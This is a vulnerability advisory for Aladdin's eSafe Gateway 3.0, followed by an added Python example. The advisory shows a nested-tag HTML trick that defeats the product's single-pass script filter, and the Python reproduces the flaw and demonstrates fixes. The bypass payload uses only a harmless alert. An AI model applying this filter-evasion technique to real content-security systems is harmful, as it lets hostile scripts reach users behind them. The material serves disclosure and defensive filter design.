Product: eSafe Gateway
Vendor: Aladdin Knowledge Systems (www.ealaddin.com)
Version: 3.0 was tested and found vulnerable; earlier versions might be vulnerable as well.
Status: Vendor was informed.

Background
--------------------
eSafe Gateway 3.0 is an Internet content security product. It can be configured to remove scripts (VBScript, JavaScript) and other executable tags from incoming HTML documents. Alternatively, the administrator can ban certain scripting commands from appearing inside scripts; the banned commands are removed while the rest of the HTML page is left intact.

The problem
----------------------
Using specially crafted HTML files, an attacker can easily bypass eSafe's script filtering mechanism.

Details
----------------------
Suppose we want the following HTML code to enter an organization and the script it contains to be executed:

<HTML><HEAD></HEAD>
<BODY>
<SCRIPT language="JavaScript">
alert("hi");
</SCRIPT>
</BODY></HTML>

If we run this page through eSafe's filtering engine, the script is filtered out and the result is the following HTML code:

<HTML><HEAD></HEAD>
<BODY>
</BODY></HTML>

However, if we create the following code:

<HTML><HEAD></HEAD>
<BODY>
<SCRIPT<script language="javascript"> </script> language="javascript">
alert("hi");
</SCRIPT>
</BODY></HTML>

then only the inner <script language="javascript"> </script> is extracted, and we are left with the following HTML code, in which the script is intact and will execute in the browser:

<HTML><HEAD></HEAD>
<BODY>
<SCRIPT language="javascript">
alert("hi");
</SCRIPT>
</BODY></HTML>

The filter evidently removes the inner element in a single pass and does not re-examine its own output: deleting the inner element reassembles the mangled outer tag into a well-formed <SCRIPT> element, which then passes through untouched.

Solution
------------------
Do not rely on eSafe Gateway for HTML filtering until Aladdin fixes the problem.

====================
Discovered by: eDvice Security Services
[EMAIL PROTECTED]
http://www.edvicetech.com
Tel: +972-3-6120133
Fax: +972-3-6954837
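The following Python is an added example, not part of the original advisory and not eSafe's code. It models the single-pass behaviour described under "Details" with a hypothetical regex-based script stripper, reproduces the bypass on the two HTML documents from the advisory (embedded here as constructed test data), and shows the two checks a filter author would want: re-applying the filter until its output stops changing, and failing closed if any <script token survives.

```python
import re

# Constructed sample inputs: the two documents from the advisory.
PLAIN = (
    '<HTML><HEAD></HEAD>\n<BODY>\n'
    '<SCRIPT language="JavaScript">\nalert("hi");\n</SCRIPT>\n'
    '</BODY></HTML>'
)
NESTED = (
    '<HTML><HEAD></HEAD>\n<BODY>\n'
    '<SCRIPT<script language="javascript"> </script> language="javascript">\n'
    'alert("hi");\n</SCRIPT>\n'
    '</BODY></HTML>'
)

# Hypothetical filter rule: a <script ...> open tag (name followed by whitespace
# or '>') through the matching </script>. "<SCRIPT<" is not a complete tag name
# here, so the leftmost match is the inner element, exactly as the advisory shows.
SCRIPT_ELEMENT = re.compile(
    r'<script(?=[\s>])[^>]*>.*?</script\s*>',
    re.IGNORECASE | re.DOTALL,
)
SCRIPT_TOKEN = re.compile(r'<\s*script\b', re.IGNORECASE)


def strip_scripts_once(html: str) -> str:
    """Single-pass stripper modelling the vulnerable behaviour (hypothetical)."""
    return SCRIPT_ELEMENT.sub('', html)


def strip_scripts_to_fixpoint(html: str, max_rounds: int = 10) -> str:
    """Re-apply the stripper until the output stops changing.

    The tag reassembled by the first pass is caught by the second pass.
    A bound on rounds guards against pathological inputs.
    """
    for _ in range(max_rounds):
        cleaned = strip_scripts_once(html)
        if cleaned == html:
            return cleaned
        html = cleaned
    raise ValueError('script filter did not converge')


def contains_script(html: str) -> bool:
    """Post-filter check: does anything that a browser could read as <script remain?"""
    return SCRIPT_TOKEN.search(html) is not None


def filter_html(html: str) -> str:
    """Fail-closed filter: strip to a fixpoint, then reject rather than pass
    a document in which a script token is still present."""
    cleaned = strip_scripts_to_fixpoint(html)
    if contains_script(cleaned):
        raise ValueError('script content survived filtering; rejecting document')
    return cleaned


if __name__ == '__main__':
    print('single pass on NESTED leaves a script:', contains_script(strip_scripts_once(NESTED)))
    print('fixpoint on NESTED leaves a script:   ', contains_script(strip_scripts_to_fixpoint(NESTED)))
```

Running the block prints True for the single-pass filter and False for the fixpoint filter. Iterating to a fixpoint closes this particular trick, but the more robust design is to parse the document with a real HTML tokenizer and re-serialize only the elements you allow, so that the filter and the browser agree on where each tag begins and ends; the fail-closed check in filter_html is the safety net for the cases where they do not.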